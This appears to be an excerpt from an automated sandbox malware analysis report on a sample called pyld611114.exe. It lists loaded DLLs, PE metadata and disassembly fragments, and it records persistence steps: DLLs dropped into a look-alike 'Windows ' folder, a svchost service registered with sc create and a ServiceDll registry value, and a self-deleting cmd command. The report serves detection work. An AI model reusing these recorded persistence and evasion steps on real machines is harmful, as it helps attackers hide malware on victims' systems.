Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\crypti.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\crypti.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\crypti.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\crypti.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\crypti.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\crypti.exeSection loaded: kernel.appcore.dll
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: pyld611114.exeStatic PE information: Image base 0x140000000 > 0x60000000
Source: pyld611114.exeStatic file information: File size 15180800 > 1048576
Source: pyld611114.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0xe37000
Source: pyld611114.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: pyld611114.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: pyld611114.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: pyld611114.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: pyld611114.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: pyld611114.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: pyld611114.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: pyld611114.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Program Files\vcpkg\buildtrees\curl\x64-windows-rel\lib\libcurl.pdb source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000002.2457655887.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 0000002D.00000002.2564189526.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-15.7\Release\libpq\libpq.pdbGG source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: vcruntime140d.amd64.pdb source: pyld611114.exe, 00000000.00000000.2199541495.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, pyld611114.exe, 00000000.00000002.2380167974.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000002.2457655887.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF792994000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: vcruntime140d.amd64.pdb,,, source: pyld611114.exe, 00000000.00000000.2199541495.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, pyld611114.exe, 00000000.00000002.2380167974.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000002.2457655887.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF792994000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb## source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3452174968.00007FFDA546F000.00000002.00000001.01000000.0000000E.sdmp, console_zero.exe, 0000002D.00000002.2564379487.00007FFDA546F000.00000002.00000001.01000000.0000000E.sdmp
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-15.7\Release\libpq\libpq.pdb source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libcrypto-3-x64.pdb source: pyld611114.exe, 00000000.00000000.2199541495.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, pyld611114.exe, 00000000.00000002.2380167974.00007FF66835E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000002.2457655887.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF792994000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3450709409.00007FFD93F8B000.00000002.00000001.01000000.00000010.sdmp
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdb source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: D:\a\postgresql-packaging-foundation\postgresql-packaging-foundation\postgresql-16.3\Release\libpq\libpq.pdbJJ source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\zlib\x64-windows-rel\zlib.pdb source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3452174968.00007FFDA546F000.00000002.00000001.01000000.0000000E.sdmp, console_zero.exe, 0000002D.00000002.2564379487.00007FFDA546F000.00000002.00000001.01000000.0000000E.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: ucrtbased.pdb source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: C:\Program Files\vcpkg\buildtrees\openssl\x64-windows-rel\libssl-3-x64.pdb{{ source: pyld611114.exe, 00000000.00000002.2380167974.00007FF668D5E000.00000002.00000001.01000000.00000003.sdmp, usvcinsta64.exe, 0000000C.00000000.2359528709.00007FF793394000.00000002.00000001.01000000.00000006.sdmp, svchost.exe, 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: PrintUI.pdb source: usvcinsta64.exe, 0000000C.00000003.2444120112.000001EE7B67E000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 0000001B.00000000.2444821279.00007FF63F422000.00000002.00000001.01000000.00000009.sdmp, printui.exe, 0000001B.00000002.2552606972.00007FF63F422000.00000002.00000001.01000000.00000009.sdmp
Source: Binary string: PrintUI.pdbGCTL source: usvcinsta64.exe, 0000000C.00000003.2444120112.000001EE7B67E000.00000004.00000020.00020000.00000000.sdmp, printui.exe, 0000001B.00000000.2444821279.00007FF63F422000.00000002.00000001.01000000.00000009.sdmp, printui.exe, 0000001B.00000002.2552606972.00007FF63F422000.00000002.00000001.01000000.00000009.sdmp
Source: pyld611114.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: pyld611114.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: pyld611114.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: pyld611114.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: pyld611114.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA377B470 WSAStartup,WSACleanup,GetModuleHandleW,GetProcAddress,wcspbrk,LoadLibraryW,GetProcAddress,LoadLibraryExW,GetSystemDirectoryW,malloc,GetSystemDirectoryW,LoadLibraryW,free,GetProcAddress,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,QueryPerformanceFrequency, 42_2_00007FFDA377B470
Source: pyld611114.exeStatic PE information: section name: .fptable
Source: usvcinsta64.exe.0.drStatic PE information: section name: .fptable
Source: printui.dll.12.drStatic PE information: section name: .fptable
Source: libiconv-2.dll.27.drStatic PE information: section name: .xdata
Source: libiconv-2.dll.27.drStatic PE information: section name: /4
Source: libiconv-2.dll.27.drStatic PE information: section name: /19
Source: libiconv-2.dll.27.drStatic PE information: section name: /31
Source: libiconv-2.dll.27.drStatic PE information: section name: /45
Source: libiconv-2.dll.27.drStatic PE information: section name: /57
Source: libiconv-2.dll.27.drStatic PE information: section name: /70
Source: libiconv-2.dll.27.drStatic PE information: section name: /81
Source: libiconv-2.dll.27.drStatic PE information: section name: /92
Source: libintl-9.dll.27.drStatic PE information: section name: .xdata
Source: libintl-9.dll.27.drStatic PE information: section name: /4
Source: libintl-9.dll.27.drStatic PE information: section name: /19
Source: libintl-9.dll.27.drStatic PE information: section name: /31
Source: libintl-9.dll.27.drStatic PE information: section name: /45
Source: libintl-9.dll.27.drStatic PE information: section name: /57
Source: libintl-9.dll.27.drStatic PE information: section name: /70
Source: libintl-9.dll.27.drStatic PE information: section name: /81
Source: libintl-9.dll.27.drStatic PE information: section name: /92
Source: libwinpthread-1.dll.27.drStatic PE information: section name: .xdata
Source: console_zero.exe.27.drStatic PE information: section name: .fptable
Source: vcruntime140d.dll.27.drStatic PE information: section name: _RDATA
Source: x816796.dat.27.drStatic PE information: section name: .fptable
Source: C:\Windows\System32\svchost.exeCode function: 42_2_649487B2 push r11; ret 42_2_649487ED
Source: C:\Windows\System32\svchost.exeCode function: 42_2_660224A8 push rax; retf 42_2_660224B1
Source: C:\Windows\System32\svchost.exeCode function: 42_2_6829984B push 00000000h; retf 42_2_68299850
Source: C:\Windows\System32\svchost.exeCode function: 42_2_682970AC push rax; iretd 42_2_682970AD
Source: C:\Windows\System32\svchost.exeCode function: 42_2_682951B2 push rdx; retn 0000h 42_2_682951B3
Source: C:\Windows\System32\svchost.exeCode function: 42_2_6829998B push 00000000h; ret 42_2_68299990
Source: C:\Windows\System32\svchost.exeCode function: 42_2_6829999B push 00000000h; iretd 42_2_682999A0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_6829AA73 push 00000000h; ret 42_2_6829AA78
Source: C:\Windows\System32\svchost.exeCode function: 42_2_6829ABBB push 00000000h; retf 42_2_6829ABC0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_6829ABB3 push 00000000h; ret 42_2_6829ABB8
Source: C:\Windows\System32\svchost.exeCode function: 42_2_6829A7AB push 00000000h; iretd 42_2_6829A7B0
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA361C2D0 push 680001C2h; retn 0001h 42_2_00007FFDA361C2D5
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA361C2C8 push 680001C2h; retn 0001h 42_2_00007FFDA361C2CD
Source: C:\Windows\System32\svchost.exeCode function: 42_2_00007FFDA361C2B8 push 050001C2h; retn 0001h 42_2_00007FFDA361C2C5

Persistence and Installation Behavior

Source: C:\Windows\System32\reg.exeKey value created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\x816796\Parameters ServiceDll C:\Windows\System32\x816796.dat
Source: C:\Windows\System32\cmd.exeExecutable created and started: C:\Windows\System32\console_zero.exe
Source: C:\Windows\System32\cmd.exeExecutable created and started: C:\Windows\System32\usvcinsta64.exe
Source: C:\Windows\System32\cmd.exeExecutable created and started: c:\windows\system32\crypti.exe
Source: C:\Windows\System32\cmd.exeExecutable created and started: C:\Windows \System32\printui.exe
Source: C:\Users\user\Desktop\pyld611114.exeFile created: C:\Windows\System32\usvcinsta64.exe
Source: C:\Windows\System32\usvcinsta64.exeFile created: C:\Windows \System32\printui.exe
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libcurl.dll
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\vcruntime140d.dll
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libiconv-2.dll
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libcrypto-3-x64.dll
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libssl-3-x64.dll
Source: C:\Windows\System32\usvcinsta64.exeFile created: C:\Windows \System32\printui.dll
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\console_zero.exe
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libwinpthread-1.dll
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libintl-9.dll
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\x816796.dat
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\zlib1.dll
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\ucrtbased.dll
Source: C:\Windows \System32\printui.exeFile created: C:\Windows\System32\libpq.dll

Boot Survival

Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /delete /tn "console_zero" /f
Source: C:\Windows\System32\reg.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\x816796\Parameters
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create x816796 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (28 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (21 identical entries)
Source: C:\Users\user\Desktop\pyld611114.exe Process created: cmd.exe /c timeout /t 10 /nobreak && del "C:\Users\user\Desktop\pyld611114.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX (identical entry repeated 202 times)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
